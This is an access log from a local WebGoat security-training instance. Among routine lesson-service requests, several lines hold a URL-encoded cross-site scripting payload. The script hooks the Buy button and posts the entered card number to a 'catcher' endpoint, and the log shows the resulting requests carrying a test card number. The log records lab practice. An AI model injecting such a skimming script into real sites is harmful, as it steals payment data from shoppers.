0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:11:57 -0400] GET /WebGoat/service/hint.mvc HTTP/1.1 200 419 http-bio-2210-exec-10 3
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:11:57 -0400] GET /WebGoat/service/cookie.mvc HTTP/1.1 200 335 http-bio-2210-exec-2 2
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:11:57 -0400] GET /WebGoat/service/lessoninfo.mvc HTTP/1.1 200 138 http-bio-2210-exec-3 13
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:11:57 -0400] GET /WebGoat/service/source.mvc HTTP/1.1 200 13184 http-bio-2210-exec-9 8
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:11:57 -0400] GET /WebGoat/service/lessonmenu.mvc HTTP/1.1 200 10844 http-bio-2210-exec-1 4
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:11:57 -0400] GET /WebGoat/service/lessonprogress.mvc HTTP/1.1 200 117 http-bio-2210-exec-8 2
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:01 -0400] POST /WebGoat/catcher?PROPERTY=yes&stolen-credit-card=4128%203214%200002%201999 HTTP/1.1 200 - http-bio-2210-exec-8 10
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:01 -0400] GET /WebGoat/attack?Screen=297061215&menu=900&QTY1=0&QTY2=0&QTY3=0&QTY4=0&input1=4128+3214+0002+1999&input2=%3Cscript%3E+++++document.getElementsByName(%22input2%22)%5B0%5D.value+%3D+%22000%22%3B+++++document.getElementsByName(%22buy%22)%5B0%5D.addEventListener(%27click%27%2C+function()+%7B+++++++++var+cardnumber+%3D+document.getElementsByName(%22input1%22)%5B0%5D.value%3B+++++++++var+url+%3D+%22http%3A%2F%2Flocalhost%3A2210%2FWebGoat%2Fcatcher%3FPROPERTY%3Dyes%26stolen-credit-card%3D%22+%2B+cardnumber%3B+++++++++var+xhttp+%3D+new+XMLHttpRequest()%3B+++++++++xhttp.open(%22POST%22%2C+url%2C+false)%3B+++++++++xhttp.send()%3B+++++%7D)%3B+++++document.getElementById(%22message%22).innerHTML%3D%22%22%3B+%3C%2Fscript%3E&buy=Buy HTTP/1.1 200 3633 http-bio-2210-exec-8 23
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:01 -0400] GET /WebGoat/service/lessonplan.mvc HTTP/1.1 200 1105 http-bio-2210-exec-4 2
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:01 -0400] GET /WebGoat/service/hint.mvc HTTP/1.1 200 419 http-bio-2210-exec-3 3
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:01 -0400] GET /WebGoat/service/cookie.mvc HTTP/1.1 200 335 http-bio-2210-exec-10 3
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:01 -0400] GET /WebGoat/service/solution.mvc HTTP/1.1 200 28716 http-bio-2210-exec-9 4
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:01 -0400] GET /WebGoat/service/source.mvc HTTP/1.1 200 13184 http-bio-2210-exec-2 8
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:01 -0400] GET /WebGoat/service/lessoninfo.mvc HTTP/1.1 200 138 http-bio-2210-exec-8 15
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:01 -0400] GET /WebGoat/service/lessonprogress.mvc HTTP/1.1 200 117 http-bio-2210-exec-10 1
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:01 -0400] GET /WebGoat/service/lessonmenu.mvc HTTP/1.1 200 10844 http-bio-2210-exec-4 11
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:02 -0400] GET /WebGoat/service/restartlesson.mvc HTTP/1.1 200 - http-bio-2210-exec-4 2
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:02 -0400] GET /WebGoat/attack?Screen=297061215&menu=900 HTTP/1.1 200 2548 http-bio-2210-exec-4 14
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:02 -0400] GET /WebGoat/service/lessonplan.mvc HTTP/1.1 200 1105 http-bio-2210-exec-10 2
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:02 -0400] GET /WebGoat/service/hint.mvc HTTP/1.1 200 419 http-bio-2210-exec-9 3
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:02 -0400] GET /WebGoat/service/solution.mvc HTTP/1.1 200 28716 http-bio-2210-exec-2 4
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:02 -0400] GET /WebGoat/service/cookie.mvc HTTP/1.1 200 335 http-bio-2210-exec-3 3
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:02 -0400] GET /WebGoat/service/lessoninfo.mvc HTTP/1.1 200 138 http-bio-2210-exec-4 15
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:02 -0400] GET /WebGoat/service/source.mvc HTTP/1.1 200 13184 http-bio-2210-exec-8 8
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:02 -0400] GET /WebGoat/service/lessonmenu.mvc HTTP/1.1 200 10844 http-bio-2210-exec-10 7
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:02 -0400] GET /WebGoat/service/lessonprogress.mvc HTTP/1.1 200 117 http-bio-2210-exec-9 1
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:04 -0400] GET /WebGoat/start.mvc HTTP/1.1 200 15943 http-bio-2210-exec-9 4
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:04 -0400] GET /WebGoat/service/debug/labels.mvc HTTP/1.1 200 43 http-bio-2210-exec-1 3
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:04 -0400] GET /WebGoat/service/lessonmenu.mvc HTTP/1.1 200 10844 http-bio-2210-exec-9 8
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:04 -0400] GET /WebGoat/service/lessonmenu.mvc HTTP/1.1 200 10844 http-bio-2210-exec-1 5
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:04 -0400] GET /WebGoat/attack?Screen=297061215&menu=900 HTTP/1.1 200 2548 http-bio-2210-exec-8 22
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:04 -0400] GET /WebGoat/service/lessonmenu.mvc HTTP/1.1 200 10844 http-bio-2210-exec-9 5
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:04 -0400] GET /WebGoat/attack?Screen=297061215&menu=900 HTTP/1.1 200 2548 http-bio-2210-exec-8 14
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:04 -0400] GET /WebGoat/service/lessonplan.mvc HTTP/1.1 200 1105 http-bio-2210-exec-4 2
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:04 -0400] GET /WebGoat/service/lessoninfo.mvc HTTP/1.1 200 138 http-bio-2210-exec-1 15
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:04 -0400] GET /WebGoat/service/solution.mvc HTTP/1.1 200 28716 http-bio-2210-exec-3 4
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:04 -0400] GET /WebGoat/service/source.mvc HTTP/1.1 200 13184 http-bio-2210-exec-5 7
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:04 -0400] GET /WebGoat/service/hint.mvc HTTP/1.1 200 419 http-bio-2210-exec-9 2
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:04 -0400] GET /WebGoat/service/cookie.mvc HTTP/1.1 200 335 http-bio-2210-exec-1 1
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:04 -0400] GET /WebGoat/service/lessonprogress.mvc HTTP/1.1 200 117 http-bio-2210-exec-4 2
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:04 -0400] GET /WebGoat/service/lessonmenu.mvc HTTP/1.1 200 10844 http-bio-2210-exec-3 9
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:04 -0400] GET /WebGoat/service/lessoninfo.mvc HTTP/1.1 200 138 http-bio-2210-exec-8 12
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:04 -0400] GET /WebGoat/service/lessonplan.mvc HTTP/1.1 200 1105 http-bio-2210-exec-5 2
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:04 -0400] GET /WebGoat/service/solution.mvc HTTP/1.1 200 28716 http-bio-2210-exec-9 3
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:04 -0400] GET /WebGoat/service/hint.mvc HTTP/1.1 200 419 http-bio-2210-exec-4 1
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:04 -0400] GET /WebGoat/service/source.mvc HTTP/1.1 200 13184 http-bio-2210-exec-1 6
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:04 -0400] GET /WebGoat/service/cookie.mvc HTTP/1.1 200 335 http-bio-2210-exec-8 1
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:04 -0400] GET /WebGoat/service/lessonprogress.mvc HTTP/1.1 200 117 http-bio-2210-exec-5 2
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:04 -0400] GET /WebGoat/service/lessonmenu.mvc HTTP/1.1 200 10844 http-bio-2210-exec-3 6
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:13 -0400] GET /WebGoat/attack?Screen=297061215&menu=900&QTY1=0&QTY2=0&QTY3=0&QTY4=0&input1=4128+3214+0002+1999&input2=%3Cscript%3E+++++document.getElementsByName(%22input2%22)%5B0%5D.value+%3D+%22000%22%3B+++++document.getElementsByName(%22buy%22)%5B0%5D.addEventListener(%27click%27%2C+function()+%7B+++++++++var+cardnumber+%3D+document.getElementsByName(%22input1%22)%5B0%5D.value%3B+++++++++var+url+%3D+%22http%3A%2F%2Flocalhost%3A2210%2FWebGoat%2Fcatcher%3FPROPERTY%3Dyes%26stolen-credit-card%3D%22+%2B+cardnumber%3B+++++++++var+xhttp+%3D+new+XMLHttpRequest()%3B+++++++++xhttp.open(%22POST%22%2C+url%2C+false)%3B+++++++++xhttp.send()%3B+++++%7D)%3B+++++document.getElementById(%22message%22).innerHTML%3D%22%22%3B+%3C%2Fscript%3E&buy=Buy HTTP/1.1 200 3633 http-bio-2210-exec-10 24
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:13 -0400] GET /WebGoat/service/lessonplan.mvc HTTP/1.1 200 1105 http-bio-2210-exec-5 3
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:13 -0400] GET /WebGoat/service/hint.mvc HTTP/1.1 200 419 http-bio-2210-exec-9 3
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:13 -0400] GET /WebGoat/service/cookie.mvc HTTP/1.1 200 335 http-bio-2210-exec-4 3
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:13 -0400] GET /WebGoat/service/solution.mvc HTTP/1.1 200 28716 http-bio-2210-exec-8 5
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:13 -0400] GET /WebGoat/service/source.mvc HTTP/1.1 200 13184 http-bio-2210-exec-1 7
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:13 -0400] GET /WebGoat/service/lessoninfo.mvc HTTP/1.1 200 138 http-bio-2210-exec-10 15
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:13 -0400] GET /WebGoat/service/lessonprogress.mvc HTTP/1.1 200 117 http-bio-2210-exec-4 1
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:13 -0400] GET /WebGoat/service/lessonmenu.mvc HTTP/1.1 200 10844 http-bio-2210-exec-9 8
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:16 -0400] GET /WebGoat/service/restartlesson.mvc HTTP/1.1 200 - http-bio-2210-exec-9 1
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:16 -0400] GET /WebGoat/attack?Screen=297061215&menu=900 HTTP/1.1 200 2548 http-bio-2210-exec-9 17
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:16 -0400] GET /WebGoat/service/lessonplan.mvc HTTP/1.1 200 1105 http-bio-2210-exec-1 2
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:16 -0400] GET /WebGoat/service/hint.mvc HTTP/1.1 200 419 http-bio-2210-exec-8 3
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:16 -0400] GET /WebGoat/service/solution.mvc HTTP/1.1 200 28716 http-bio-2210-exec-4 4
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:16 -0400] GET /WebGoat/service/cookie.mvc HTTP/1.1 200 335 http-bio-2210-exec-5 3
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:16 -0400] GET /WebGoat/service/source.mvc HTTP/1.1 200 13184 http-bio-2210-exec-10 7
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:16 -0400] GET /WebGoat/service/lessoninfo.mvc HTTP/1.1 200 138 http-bio-2210-exec-9 13
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:16 -0400] GET /WebGoat/service/lessonprogress.mvc HTTP/1.1 200 117 http-bio-2210-exec-8 1
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:16 -0400] GET /WebGoat/service/lessonmenu.mvc HTTP/1.1 200 10844 http-bio-2210-exec-1 4
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:18 -0400] GET /WebGoat/service/restartlesson.mvc HTTP/1.1 200 - http-bio-2210-exec-1 2
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:18 -0400] GET /WebGoat/attack?Screen=297061215&menu=900 HTTP/1.1 200 2548 http-bio-2210-exec-1 18
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:18 -0400] GET /WebGoat/service/lessonplan.mvc HTTP/1.1 200 1105 http-bio-2210-exec-8 2
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:18 -0400] GET /WebGoat/service/solution.mvc HTTP/1.1 200 28716 http-bio-2210-exec-9 4
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:18 -0400] GET /WebGoat/service/hint.mvc HTTP/1.1 200 419 http-bio-2210-exec-2 3
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:18 -0400] GET /WebGoat/service/cookie.mvc HTTP/1.1 200 335 http-bio-2210-exec-4 4
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:18 -0400] GET /WebGoat/service/lessoninfo.mvc HTTP/1.1 200 138 http-bio-2210-exec-1 15
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:18 -0400] GET /WebGoat/service/source.mvc HTTP/1.1 200 13184 http-bio-2210-exec-10 12
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:18 -0400] GET /WebGoat/service/lessonprogress.mvc HTTP/1.1 200 117 http-bio-2210-exec-1 1
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:18 -0400] GET /WebGoat/service/lessonmenu.mvc HTTP/1.1 200 10844 http-bio-2210-exec-8 11
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:18 -0400] GET /WebGoat/service/restartlesson.mvc HTTP/1.1 200 - http-bio-2210-exec-8 2
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:18 -0400] GET /WebGoat/attack?Screen=297061215&menu=900 HTTP/1.1 200 2548 http-bio-2210-exec-8 22
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:18 -0400] GET /WebGoat/service/lessonplan.mvc HTTP/1.1 200 1105 http-bio-2210-exec-1 1
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:18 -0400] GET /WebGoat/service/lessoninfo.mvc HTTP/1.1 200 138 http-bio-2210-exec-8 8
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:18 -0400] GET /WebGoat/service/hint.mvc HTTP/1.1 200 419 http-bio-2210-exec-2 4
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:18 -0400] GET /WebGoat/service/cookie.mvc HTTP/1.1 200 335 http-bio-2210-exec-4 3
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:18 -0400] GET /WebGoat/service/solution.mvc HTTP/1.1 200 28716 http-bio-2210-exec-10 5
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:18 -0400] GET /WebGoat/service/lessonprogress.mvc HTTP/1.1 200 117 http-bio-2210-exec-8 1
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:18 -0400] GET /WebGoat/service/lessonmenu.mvc HTTP/1.1 200 10844 http-bio-2210-exec-1 3
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:18 -0400] GET /WebGoat/service/source.mvc HTTP/1.1 200 13184 http-bio-2210-exec-9 8
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:18 -0400] GET /WebGoat/service/restartlesson.mvc HTTP/1.1 200 - http-bio-2210-exec-9 1
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:18 -0400] GET /WebGoat/attack?Screen=297061215&menu=900 HTTP/1.1 200 2548 http-bio-2210-exec-9 16
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:18 -0400] GET /WebGoat/service/lessonplan.mvc HTTP/1.1 200 1105 http-bio-2210-exec-1 1
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:18 -0400] GET /WebGoat/service/solution.mvc HTTP/1.1 200 28716 http-bio-2210-exec-8 4
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:18 -0400] GET /WebGoat/service/cookie.mvc HTTP/1.1 200 335 http-bio-2210-exec-4 2
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:18 -0400] GET /WebGoat/service/hint.mvc HTTP/1.1 200 419 http-bio-2210-exec-7 3
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:19 -0400] GET /WebGoat/service/lessoninfo.mvc HTTP/1.1 200 138 http-bio-2210-exec-9 13
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:19 -0400] GET /WebGoat/service/source.mvc HTTP/1.1 200 13184 http-bio-2210-exec-10 8
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:19 -0400] GET /WebGoat/service/lessonprogress.mvc HTTP/1.1 200 117 http-bio-2210-exec-8 2
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:19 -0400] GET /WebGoat/service/lessonmenu.mvc HTTP/1.1 200 10844 http-bio-2210-exec-1 6
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:19 -0400] GET /WebGoat/service/restartlesson.mvc HTTP/1.1 200 - http-bio-2210-exec-1 2
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:19 -0400] GET /WebGoat/attack?Screen=297061215&menu=900 HTTP/1.1 200 2548 http-bio-2210-exec-1 20
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:19 -0400] GET /WebGoat/service/lessonplan.mvc HTTP/1.1 200 1105 http-bio-2210-exec-8 1
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:19 -0400] GET /WebGoat/service/cookie.mvc HTTP/1.1 200 335 http-bio-2210-exec-9 3
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:19 -0400] GET /WebGoat/service/hint.mvc HTTP/1.1 200 419 http-bio-2210-exec-4 3
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:19 -0400] GET /WebGoat/service/solution.mvc HTTP/1.1 200 28716 http-bio-2210-exec-10 4
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:19 -0400] GET /WebGoat/service/lessoninfo.mvc HTTP/1.1 200 138 http-bio-2210-exec-1 15
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:19 -0400] GET /WebGoat/service/source.mvc HTTP/1.1 200 13184 http-bio-2210-exec-7 7
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:19 -0400] GET /WebGoat/service/lessonprogress.mvc HTTP/1.1 200 117 http-bio-2210-exec-9 1
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:19 -0400] GET /WebGoat/service/lessonmenu.mvc HTTP/1.1 200 10844 http-bio-2210-exec-8 8
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:22 -0400] GET /WebGoat/attack?Screen=297061215&menu=900&QTY1=0&QTY2=0&QTY3=0&QTY4=0&input1=4128+3214+0002+1999&input2=%3Cscript%3E+++++document.getElementsByName(%22input2%22)%5B0%5D.value+%3D+%22000%22%3B+++++document.getElementsByName(%22buy%22)%5B0%5D.addEventListener(%27click%27%2C+function()+%7B+++++++++var+cardnumber+%3D+document.getElementsByName(%22input1%22)%5B0%5D.value%3B+++++++++var+url+%3D+%22http%3A%2F%2Flocalhost%3A2210%2FWebGoat%2Fcatcher%3FPROPERTY%3Dyes%26stolen-credit-card%3D%22+%2B+cardnumber%3B+++++++++var+xhttp+%3D+new+XMLHttpRequest()%3B+++++++++xhttp.open(%22POST%22%2C+url%2C+false)%3B+++++++++xhttp.send()%3B+++++%7D)%3B+++++document.getElementById(%22message%22).innerHTML%3D%22%22%3B+%3C%2Fscript%3E&buy=Buy HTTP/1.1 200 3633 http-bio-2210-exec-8 18
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:22 -0400] GET /WebGoat/service/lessonplan.mvc HTTP/1.1 200 1105 http-bio-2210-exec-9 1
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:22 -0400] GET /WebGoat/service/hint.mvc HTTP/1.1 200 419 http-bio-2210-exec-10 3
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:22 -0400] GET /WebGoat/service/cookie.mvc HTTP/1.1 200 335 http-bio-2210-exec-4 3
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:22 -0400] GET /WebGoat/service/solution.mvc HTTP/1.1 200 28716 http-bio-2210-exec-7 4
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:22 -0400] GET /WebGoat/service/source.mvc HTTP/1.1 200 13184 http-bio-2210-exec-1 6
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:22 -0400] GET /WebGoat/service/lessoninfo.mvc HTTP/1.1 200 138 http-bio-2210-exec-8 15
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:22 -0400] GET /WebGoat/service/lessonprogress.mvc HTTP/1.1 200 117 http-bio-2210-exec-10 1
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:22 -0400] GET /WebGoat/service/lessonmenu.mvc HTTP/1.1 200 10844 http-bio-2210-exec-9 5
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:54 -0400] POST /WebGoat/catcher?PROPERTY=yes&stolen-credit-card=4128%203214%200002%201999 HTTP/1.1 200 - http-bio-2210-exec-9 10
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:54 -0400] GET /WebGoat/attack?Screen=297061215&menu=900&QTY1=0&QTY2=0&QTY3=0&QTY4=0&input1=4128+3214+0002+1999&input2=%3Cscript%3E+++++document.getElementsByName(%22input2%22)%5B0%5D.value+%3D+%22000%22%3B+++++document.getElementsByName(%22buy%22)%5B0%5D.addEventListener(%27click%27%2C+function()+%7B+++++++++var+cardnumber+%3D+document.getElementsByName(%22input1%22)%5B0%5D.value%3B+++++++++var+url+%3D+%22http%3A%2F%2Flocalhost%3A2210%2FWebGoat%2Fcatcher%3FPROPERTY%3Dyes%26stolenCardNum%3D%22+%2B+cardnumber%3B+++++++++var+xhttp+%3D+new+XMLHttpRequest()%3B+++++++++xhttp.open(%22POST%22%2C+url%2C+false)%3B+++++++++xhttp.send()%3B+++++%7D)%3B+++++document.getElementById(%22message%22).innerHTML%3D%22%22%3B+%3C%2Fscript%3E&buy=Buy HTTP/1.1 200 3623 http-bio-2210-exec-9 24
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:54 -0400] GET /WebGoat/service/lessonplan.mvc HTTP/1.1 200 1105 http-bio-2210-exec-1 3
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:54 -0400] GET /WebGoat/service/cookie.mvc HTTP/1.1 200 335 http-bio-2210-exec-4 3
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:55 -0400] GET /WebGoat/service/hint.mvc HTTP/1.1 200 419 http-bio-2210-exec-7 4
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:55 -0400] GET /WebGoat/service/solution.mvc HTTP/1.1 200 28716 http-bio-2210-exec-8 5
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:55 -0400] GET /WebGoat/service/lessoninfo.mvc HTTP/1.1 200 138 http-bio-2210-exec-9 13
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:55 -0400] GET /WebGoat/service/source.mvc HTTP/1.1 200 13184 http-bio-2210-exec-10 7
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:55 -0400] GET /WebGoat/service/lessonprogress.mvc HTTP/1.1 200 117 http-bio-2210-exec-4 1
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:55 -0400] GET /WebGoat/service/lessonmenu.mvc HTTP/1.1 200 10844 http-bio-2210-exec-1 4
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:57 -0400] GET /WebGoat/service/restartlesson.mvc HTTP/1.1 200 - http-bio-2210-exec-1 1
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:57 -0400] GET /WebGoat/attack?Screen=297061215&menu=900 HTTP/1.1 200 2548 http-bio-2210-exec-1 40
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:57 -0400] GET /WebGoat/service/lessonplan.mvc HTTP/1.1 200 1105 http-bio-2210-exec-4 1
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:57 -0400] GET /WebGoat/service/hint.mvc HTTP/1.1 200 419 http-bio-2210-exec-9 2
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:57 -0400] GET /WebGoat/service/cookie.mvc HTTP/1.1 200 335 http-bio-2210-exec-7 3
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:57 -0400] GET /WebGoat/service/solution.mvc HTTP/1.1 200 28716 http-bio-2210-exec-10 4
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:57 -0400] GET /WebGoat/service/lessoninfo.mvc HTTP/1.1 200 138 http-bio-2210-exec-1 15
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:57 -0400] GET /WebGoat/service/lessonprogress.mvc HTTP/1.1 200 117 http-bio-2210-exec-4 2
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:57 -0400] GET /WebGoat/service/source.mvc HTTP/1.1 200 13184 http-bio-2210-exec-8 12
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:12:57 -0400] GET /WebGoat/service/lessonmenu.mvc HTTP/1.1 200 10844 http-bio-2210-exec-9 5
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:13:00 -0400] GET /WebGoat/attack?Screen=297061215&menu=900&QTY1=0&QTY2=0&QTY3=0&QTY4=0&input1=4128+3214+0002+1999&input2=%3Cscript%3E+++++document.getElementsByName(%22input2%22)%5B0%5D.value+%3D+%22000%22%3B+++++document.getElementsByName(%22buy%22)%5B0%5D.addEventListener(%27click%27%2C+function()+%7B+++++++++var+cardnumber+%3D+document.getElementsByName(%22input1%22)%5B0%5D.value%3B+++++++++var+url+%3D+%22http%3A%2F%2Flocalhost%3A2210%2FWebGoat%2Fcatcher%3FPROPERTY%3Dyes%26stolenCardNum%3D%22+%2B+cardnumber%3B+++++++++var+xhttp+%3D+new+XMLHttpRequest()%3B+++++++++xhttp.open(%22POST%22%2C+url%2C+false)%3B+++++++++xhttp.send()%3B+++++%7D)%3B+++++document.getElementById(%22message%22).innerHTML%3D%22%22%3B+%3C%2Fscript%3E&buy=Buy HTTP/1.1 200 3623 http-bio-2210-exec-9 28
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:13:00 -0400] GET /WebGoat/service/lessonplan.mvc HTTP/1.1 200 1105 http-bio-2210-exec-8 3
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:13:00 -0400] GET /WebGoat/service/hint.mvc HTTP/1.1 200 419 http-bio-2210-exec-10 4
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:13:00 -0400] GET /WebGoat/service/cookie.mvc HTTP/1.1 200 335 http-bio-2210-exec-5 4
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:13:00 -0400] GET /WebGoat/service/solution.mvc HTTP/1.1 200 28716 http-bio-2210-exec-4 4
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:13:00 -0400] GET /WebGoat/service/lessoninfo.mvc HTTP/1.1 200 138 http-bio-2210-exec-9 11
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:13:00 -0400] GET /WebGoat/service/source.mvc HTTP/1.1 200 13184 http-bio-2210-exec-1 8
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:13:00 -0400] GET /WebGoat/service/lessonprogress.mvc HTTP/1.1 200 117 http-bio-2210-exec-8 2
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:13:00 -0400] GET /WebGoat/service/lessonmenu.mvc HTTP/1.1 200 10844 http-bio-2210-exec-10 8
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:13:27 -0400] GET /WebGoat/service/restartlesson.mvc HTTP/1.1 200 - http-bio-2210-exec-10 2
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:13:27 -0400] GET /WebGoat/attack?Screen=297061215&menu=900 HTTP/1.1 200 2548 http-bio-2210-exec-10 21
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:13:27 -0400] GET /WebGoat/service/lessonplan.mvc HTTP/1.1 200 1105 http-bio-2210-exec-8 1
